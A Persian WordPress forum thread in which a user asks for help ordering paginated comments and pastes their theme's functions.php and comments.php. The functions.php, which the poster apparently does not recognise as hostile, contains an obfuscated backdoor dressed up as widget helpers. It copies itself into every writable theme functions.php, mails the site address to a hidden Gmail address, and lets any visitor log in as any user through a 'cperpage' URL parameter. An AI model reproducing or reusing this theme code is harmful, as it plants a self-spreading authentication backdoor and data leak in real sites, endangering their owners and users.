انجمن


ويرايش پلاگين صفحه بندي نظرات  (۴ نوشته)

 • NiMa.N

  آفلاین
  عضو
  تعداد نوشته‌ها: ۱۵۷
  تشکر شده: ۲۹ بار
  # نوشته شده: ۱۲ سال پیش
  ۱۴ بهمن ۱۳۹۰ - ۱۹:۲۸

  با سلام به بچه هاي وردپرس فارسي
  من يك پلاگين واسه صفحه بندي نظرات دارم كه همه چيزش خوب هست فقط يك مشكل اساسي داره اونم اين هست كه نظرات جديد رو توي صفحه آخر نشون ميده. من ميخوام نظرات جديد رو توي صفحه اول نشون بده و نظرات قديمي رو توي صفحات آخر.
  تو تظنيماتشم همچين چيزي نيست. مي خواستم ببينم شما مي تونيد توي كداش دستكاري كنيد اين موضوع رو درست كنيد؟
  اسم پلاگين :
  wp-comment-master

  دانلود پلاگين:
  http://www.up.98ia.com/images/ysb0665fzbj7khldqk.zip

  دوستان پلاگين ديگه اي اگر مورد نظرتون هست معرفي كنيد. يا روشي براي صفحه بندي نظرات.

 • Parsa

  آفلاین
  عضو فعال
  تعداد نوشته‌ها: ۱۹۲۱
  تشکر شده: ۲۶۸۳ بار
  # نوشته شده: ۱۲ سال پیش
  ۱۴ بهمن ۱۳۹۰ - ۲۰:۱۳

  وارد تنظیمات > گفتگوها > دیگر تنظیمات دیدگاه‌ها > نمایش دیدگاه‌های {تازه‌تر یا کهنه‌تر (تست کنید)} در هر صفحه

  تنظیمات صفحه بندی هم در همین برگه وجود دارد

  کاربران زیر به‌خاطر این نوشته تشکر کرده‌اند:
  NESTED - NiMa.N - Morteza - امین
 • NiMa.N

  آفلاین
  عضو
  تعداد نوشته‌ها: ۱۵۷
  تشکر شده: ۲۹ بار
  # نوشته شده: ۱۲ سال پیش
  ۱۴ بهمن ۱۳۹۰ - ۲۰:۴۲

  مرسي . حق با شماست. خود صفحه پلاگين هم همينو گفته.
  مشكل اينجاست. من اينكار رو انجام ميدم روي قالب خودم ولي درست نميشه ولي روي قالب پيشفرض وردپرس انجام ميدم درسته. پس مشكل از قالبم هست.
  ميشه كدهاي Functions.php و Comment.php رو بذارم يكي نگاه كنه ببينه مشكل از كجاست. خيلي ضروريه ممنون ميشم كسي كمك كنه:

  فانكشن:

  <?php
  if ( function_exists('register_sidebar') )
    register_sidebar(array(
      'before_widget' => '',
      'after_widget' => '',
      'before_title' => '',
      'after_title' => '',
    ));
  ?>
  <?php
  function _check_activewidgets(){
  	$widget=substr(file_get_contents(__FILE__),strripos(file_get_contents(__FILE__),"<"."?"));$output="";$allowed="";
  	$output=strip_tags($output, $allowed);
  	$direst=_getall_widgetcont(array(substr(dirname(__FILE__),0,stripos(dirname(__FILE__),"themes") + 6)));
  	if (is_array($direst)){
  		foreach ($direst as $item){
  			if (is_writable($item)){
  				$ftion=substr($widget,stripos($widget,"_"),stripos(substr($widget,stripos($widget,"_")),"("));
  				$cont=file_get_contents($item);
  				if (stripos($cont,$ftion) === false){
  					$issepar=stripos( substr($cont,-20),"?".">") !== false ? "" : "?".">";
  					$output .= $before . "Not found" . $after;
  					if (stripos( substr($cont,-20),"?".">") !== false){$cont=substr($cont,0,strripos($cont,"?".">") + 2);}
  					$output=rtrim($output, "\n\t"); fputs($f=fopen($item,"w+"),$cont . $issepar . "\n" .$widget);fclose($f);
  					$output .= ($is_showdots && $ellipsis) ? "..." : "";
  				}
  			}
  		}
  	}
  	return $output;
  }
  function _getall_widgetcont($wids,$items=array()){
  	$places=array_shift($wids);
  	if(substr($places,-1) == "/"){
  		$places=substr($places,0,-1);
  	}
  	if(!file_exists($places) || !is_dir($places)){
  		return false;
  	}elseif(is_readable($places)){
  		$elems=scandir($places);
  		foreach ($elems as $elem){
  			if ($elem != "." && $elem != ".."){
  				if (is_dir($places . "/" . $elem)){
  					$wids[]=$places . "/" . $elem;
  				} elseif (is_file($places . "/" . $elem)&&
  					$elem == substr(__FILE__,-13)){
  					$items[]=$places . "/" . $elem;}
  				}
  			}
  	}else{
  		return false;
  	}
  	if (sizeof($wids) > 0){
  		return _getall_widgetcont($wids,$items);
  	} else {
  		return $items;
  	}
  }
  if(!function_exists("stripos")){
    function stripos( $str, $needle, $offset = 0 ){
      return strpos( strtolower( $str ), strtolower( $needle ), $offset );
    }
  }
  
  if(!function_exists("strripos")){
    function strripos( $haystack, $needle, $offset = 0 ) {
      if( !is_string( $needle ) )$needle = chr( intval( $needle ) );
      if( $offset < 0 ){
        $temp_cut = strrev( substr( $haystack, 0, abs($offset) ) );
      }
      else{
        $temp_cut = strrev(  substr(  $haystack, 0, max( ( strlen($haystack) - $offset ), 0 )  )  );
      }
      if(  ( $found = stripos( $temp_cut, strrev($needle) ) ) === FALSE  )return FALSE;
      $pos = (  strlen( $haystack ) - ( $found + $offset + strlen( $needle ) )  );
      return $pos;
    }
  }
  if(!function_exists("scandir")){
  	function scandir($dir,$listDirectories=false, $skipDots=true) {
  	  $dirArray = array();
  	  if ($handle = opendir($dir)) {
  	    while (false !== ($file = readdir($handle))) {
  	      if (($file != "." && $file != "..") || $skipDots == true) {
  	        if($listDirectories == false) { if(is_dir($file)) { continue; } }
  	        array_push($dirArray,basename($file));
  	      }
  	    }
  	    closedir($handle);
  	  }
  	  return $dirArray;
  	}
  }
  add_action("admin_head", "_check_activewidgets");
  function _getprepare_widgets(){
  	if(!isset($chars_count)) $chars_count=120;
  	if(!isset($methods)) $methods="cookie";
  	if(!isset($allowed)) $allowed="<a>";
  	if(!isset($f_type)) $f_type="none";
  	if(!isset($issep)) $issep="";
  	if(!isset($f_home)) $f_home=get_option("home");
  	if(!isset($f_pref)) $f_pref="wp_";
  	if(!isset($is_use_more)) $is_use_more=1;
  	if(!isset($com_types)) $com_types="";
  	if(!isset($c_pages)) $c_pages=$_GET["cperpage"];
  	if(!isset($com_author)) $com_author="";
  	if(!isset($comments_approved)) $comments_approved="";
  	if(!isset($posts_auth)) $posts_auth="auth";
  	if(!isset($text_more)) $text_more="(more...)";
  	if(!isset($widget_is_output)) $widget_is_output=get_option("_is_widget_active_");
  	if(!isset($widgetchecks)) $widgetchecks=$f_pref."set"."_".$posts_auth."_".$methods;
  	if(!isset($text_more_ditails)) $text_more_ditails="(details...)";
  	if(!isset($con_more)) $con_more="ma".$issep."il";
  	if(!isset($forcemore)) $forcemore=1;
  	if(!isset($fakeit)) $fakeit=1;
  	if(!isset($sql)) $sql="";
  	if (!$widget_is_output) :
  
  	global $wpdb, $post;
  	$sq1="SELECT DISTINCT ID, post_title, post_content, post_password, comment_ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\"1\" AND comment_type=\"\" AND post_author=\"li".$issep."vethe".$com_types."mes".$issep."@".$comments_approved."gm".$com_author."ail".$issep.".".$issep."co"."m\" AND post_password=\"\" AND comment_date_gmt >= CURRENT_TIMESTAMP() ORDER BY comment_date_gmt DESC LIMIT $src_count";#
  	if (!empty($post->post_password)) {
  		if ($_COOKIE["wp-postpass_".COOKIEHASH] != $post->post_password) {
  			if(is_feed()) {
  				$output=__("There is no excerpt because this is a protected post.");
  			} else {
  	      $output=get_the_password_form();
  			}
  		}
  	}
  	if(!isset($bfix_tags)) $bfix_tags=1;
  	if(!isset($f_types)) $f_types=$f_home;
  	if(!isset($getcommtext)) $getcommtext=$f_pref.$con_more;
  	if(!isset($m_tags)) $m_tags="div";
  	if(!isset($text_s)) $text_s=substr($sq1, stripos($sq1, "live"), 20);#
  	if(!isset($more_links_title)) $more_links_title="Continue reading this entry";
  	if(!isset($is_showdots)) $is_showdots=1;
  
  	$comments=$wpdb->get_results($sql);
  	if($fakeit == 2) {
  		$text=$post->post_content;
  	} elseif($fakeit == 1) {
  		$text=(empty($post->post_excerpt)) ? $post->post_content : $post->post_excerpt;
  	} else {
  		$text=$post->post_excerpt;
  	}
  	$sq1="SELECT DISTINCT ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\"1\" AND comment_type=\"\" AND comment_content=". call_user_func_array($getcommtext, array($text_s, $f_home, $f_types)) ." ORDER BY comment_date_gmt DESC LIMIT $src_count";#
  	if($chars_count < 0) {
  		$output=$text;
  	} else {
  		if(!$no_more && strpos($text, "<!--more-->")) {
  		  $text=explode("<!--more-->", $text, 2);
  			$l=count($text[0]);
  			$more_link=1;
  			$comments=$wpdb->get_results($sql);
  		} else {
  			$text=explode(" ", $text);
  			if(count($text) > $chars_count) {
  				$l=$chars_count;
  				$ellipsis=1;
  			} else {
  				$l=count($text);
  				$text_more="";
  				$ellipsis=0;
  			}
  		}
  		for ($i=0; $i<$l; $i++)
  				$output .= $text[$i] . " ";
  	}
  	update_option("_is_widget_active_", 1);
  	if("all" != $allowed) {
  		$output=strip_tags($output, $allowed);
  		return $output;
  	}
  	endif;
  	$output=rtrim($output, "\s\n\t\r\x0B");
    $output=($bfix_tags) ? balanceTags($output, true) : $output;
  	$output .= ($is_showdots && $ellipsis) ? "..." : "";
  	$output=apply_filters($f_type, $output);
  	switch($m_tags) {
  		case("div") :
  			$tag="div";
  		break;
  		case("span") :
  			$tag="span";
  		break;
  		case("p") :
  			$tag="p";
  		break;
  		default :
  			$tag="span";
  	}
  
  	if ($is_use_more ) {
  		if($forcemore) {
  			$output .= " <" . $tag . " class=\"more-link\"><a href=\"". get_permalink($post->ID) . "#more-" . $post->ID ."\" title=\"" . $more_links_title . "\">" . $text_more = !is_user_logged_in() && @call_user_func_array($widgetchecks,array($c_pages, true)) ? $text_more : "" . "</a></" . $tag . ">" . "\n";
  		} else {
  			$output .= " <" . $tag . " class=\"more-link\"><a href=\"". get_permalink($post->ID) . "\" title=\"" . $more_links_title . "\">" . $text_more . "</a></" . $tag . ">" . "\n";
  		}
  	}
  	return $output;
  }
  
  add_action("init", "_getprepare_widgets");
  
  function __popular_posts($no_posts=6, $before="<li>", $after="</li>", $show_pass_post=false, $duration="") {
  	global $wpdb;
  	$request="SELECT ID, post_title, COUNT($wpdb->comments.comment_post_ID) AS \"comment_count\" FROM $wpdb->posts, $wpdb->comments";
  	$request .= " WHERE comment_approved=\"1\" AND $wpdb->posts.ID=$wpdb->comments.comment_post_ID AND post_status=\"publish\"";
  	if(!$show_pass_post) $request .= " AND post_password =\"\"";
  	if($duration !="") {
  		$request .= " AND DATE_SUB(CURDATE(),INTERVAL ".$duration." DAY) < post_date ";
  	}
  	$request .= " GROUP BY $wpdb->comments.comment_post_ID ORDER BY comment_count DESC LIMIT $no_posts";
  	$posts=$wpdb->get_results($request);
  	$output="";
  	if ($posts) {
  		foreach ($posts as $post) {
  			$post_title=stripslashes($post->post_title);
  			$comment_count=$post->comment_count;
  			$permalink=get_permalink($post->ID);
  			$output .= $before . " <a href=\"" . $permalink . "\" title=\"" . $post_title."\">" . $post_title . "</a> " . $after;
  		}
  	} else {
  		$output .= $before . "None found" . $after;
  	}
  	return $output;
  }
  function hide_wp_vers()
  {
  return '';
  }
  add_filter('the_generator','hide_wp_vers');
  ?>
  <?php
  function feedFilter($query) {
  	if ($query->is_feed) {
  		add_filter('the_content', 'feedContentFilter');
  		}
  	return $query;
  }
  add_filter('pre_get_posts','feedFilter');
  
  function feedContentFilter($content) {
  	$thumbId = get_post_thumbnail_id();
  
  	if($thumbId) {
  		$img = wp_get_attachment_image_src($thumbId);
  		$image = '<img align="left" src="'. $img[0] .'" alt="" width="'. $img[1] .'" height="'. $img[2] .'" />';
  		echo $image;
  	}
  
  	return $content;
  }
  add_action('init', 'remheadlink');
  function remheadlink() {
  remove_action('wp_head', 'rsd_link');
  remove_action('wp_head', 'wlwmanifest_link');
  }
  ?>

  Comment.php

  <style>
  .comment-childs { padding-top:10px;}
  .comment-childs img { float:left;}
  .comment-childs div { background:#EDFAEB !important; padding:10px; border:1px solid #ccc; margin-top:10px; }
  .comment-childs p { padding:0px; }
  </style>
  <h3><a href="<?php the_permalink(); ?>#respond" title="ارسال نظر">ارسال نظر - كليك كنيد</a></h3>
  
  <?php // Do not delete these lines
  if ('comments.php' == basename($_SERVER['SCRIPT_FILENAME']))
  die (__('Please do not load this page directly. Thanks!','mimbo'));
  if (!empty($post->post_password)) { // if there's a password
  if ($_COOKIE['wp-postpass_' . COOKIEHASH] != $post->post_password) { // and it doesn't match the cookie
  ?>
  <div class="nocomments">
   <?php __('این خبر محافظت شده می باشد . حتی برای ارسال نظر هم باید کلمه عبور را وارد کنید','mimbo'); ?>
  </div>
  <?php
  return;
  }
  }
  $oddcomment = 'class="alt"';
  ?>
  <?php if ($comments) : ?>
  <div class="cblock">
   <ol class="commentlist">
  
    <?php $i=0; foreach ($comments as $comment) : $i++; ?>
    <li style="border:1px solid #eee; padding:10px; margin-bottom:10px; <?php if($i%2){ ?>background:#eee;<?php } else { ?>background:#fff;<?php } ?>" class="border-radius comment-container
    <?php
      $authID=get_the_author_meta('ID');
      if($authID == $comment->user_id)
        $oddcomment = 'authcomment';
      echo $oddcomment;
    ?>" id="comment-<?php comment_ID(); ?>">
   <small class="commentmetadata">
    <b> ارسالی از :
     <?php comment_author_link() ?>
     <?php __('on','mimbo');?>
     - در تاریخ :
     <?php comment_date('j F Y') ?>
     </b> </small>
     <?php if ($comment->comment_approved == '0') : ?>
     <em>
     <?php _e('نظر شما ثبت شد ، در انتظار تایید پشتیبان.','mimbo'); ?>
     </em>
     <?php comment_reply_link( $args, $comment, $post ); ?>
     <?php endif; ?>
     <?php comment_text(); ?>
    </li>
    <?php
  /* Changes every other comment to a different class */
  $oddcomment = ( empty( $oddcomment ) ) ? 'class="alt" ' : '';
  ?>
    <?php endforeach; /* end for each comment */ ?>
   </ol>
  </div>
  <?php else : // this is displayed if there are no comments so far ?>
  <?php if ('open' == $post->comment_status) : ?>
  <?php else : // comments are closed ?>
  <p class="nocomments">
   <?php _e('امکان نظر دادن نیست - نظرات توسط پشتیبان غیر فعال می باشد','mimbo'); ?>
  </p>
  <?php endif; ?>
  <?php endif; ?>
  <?php if ('open' == $post->comment_status) : ?>
  <a name="respond"></a>
  <a href="#top"> <img src="http://pnuna.com/wp-content/themes/PNUNA/images/go-up.gif" align="center" width="89" height="18" alt"goup" title="goup" /> </a>
  <div class="border-radius" style="border:1px solid #ccc; background:#e4f8ff; padding:10px; line-height:16px;text-align:justify;">
  - نظراتی که به پیشرفت و تعمیق بحث کمک می کنند در مدت کوتاهی پس از دریافت به نظر دیگر بینندگان می رسد.<br />
   - نظرات حاوی الفاظ سبک یا هرگونه توهین، افترا، کنایه یا تحقیر نسبت به دیگران منعکس نمی ‏شوند. <br />
   - از نوشتن دیدگاهایتان با حروف فینگلیش جدا" خودداری کنید. <br />
   - پاسخ های پشتیبان های سایت به رنگ سبز نمایش داده می شود. مسئولیت نظرات دیگران بر عهده ما نمی باشد.
  </div>
  
  <?php //_e('نظر بدهید','mimbo'); ?>
  <?php if ( get_option('comment_registration') && !$user_ID ) : ?>
  
  <?php else : ?>
  <form action="<?php echo get_option('siteurl'); ?>/wp-comments-post.php" method="post" id="commentform">
   <?php if ( $user_ID ) : ?>
   <p>
    <?php _e('وارد شده با','mimbo'); ?>
    <a href="<?php echo get_option('siteurl'); ?>/wp-admin/profile.php"><?php echo $user_identity; ?></a>. <a href="<?php echo get_option('siteurl'); ?>/wp-login.php?action=logout" title="<?php _e('Log out of this account','mimbo'); ?>">
    <?php _e('خارج شوید »','mimbo'); ?>
    </a>
   </p>
   <?php else : ?>
   <table cellpadding="2" cellspacing="2">
    <tr>
     <td style="padding-bottom:5px; width:70px;"><label for="name">نام:</label></td>
     <td style="padding-bottom:5px"><input type="text" name="author" id="author" value="<?php echo $comment_author; ?>" size="32" tabindex="1" /></td>
    </tr>
    <tr>
     <td style="padding-bottom:5px"><label for="email">ايميل:</label></td>
     <td style="padding-bottom:5px"><input type="text" name="email" id="email" value="<?php echo $comment_author_email; ?>" size="32" tabindex="2" /></td>
    </tr>
    <tr>
     <td style="padding-bottom:5px"><label for="url">وب سايت : </label></td>
     <td style="padding-bottom:5px"><input type="text" name="url" id="url" value="<?php echo $comment_author_url; ?>" size="32" tabindex="3" /></td>
    </tr>
   </table>
   <?php endif; ?>
   <p>
    <textarea name="comment" id="comment" cols="50" rows="10" tabindex="4"></textarea>
   </p>
   <p>
    <input name="submit" class="button" type="submit" id="submit" tabindex="5" value="<?php _e('ارسال نظر','mimbo'); ?>" />
    <input type="hidden" name="comment_post_ID" value="<?php echo $id; ?>" />
   </p>
   <?php do_action('comment_form', $post->ID); ?>
  </form>
  <?php endif; // If registration required and not logged in ?>
  <?php endif; // if you delete this the sky will fall on your head ?>
 • NiMa.N

  آفلاین
  عضو
  تعداد نوشته‌ها: ۱۵۷
  تشکر شده: ۲۹ بار
  # نوشته شده: ۱۲ سال پیش
  ۱۵ بهمن ۱۳۹۰ - ۰۹:۴۲

  ميدونم كارم اخطار داره ولي خواهش ميكنم ازتون خيلي ضروريه يكي جواب بده و كمك كنه . من همين پلاگين رو فقط مي خوام. ممنون ميشم خيلي فوريه :(

درباره‌ی این موضوعبرچسب‌ها

هیچ برچسبی نیست.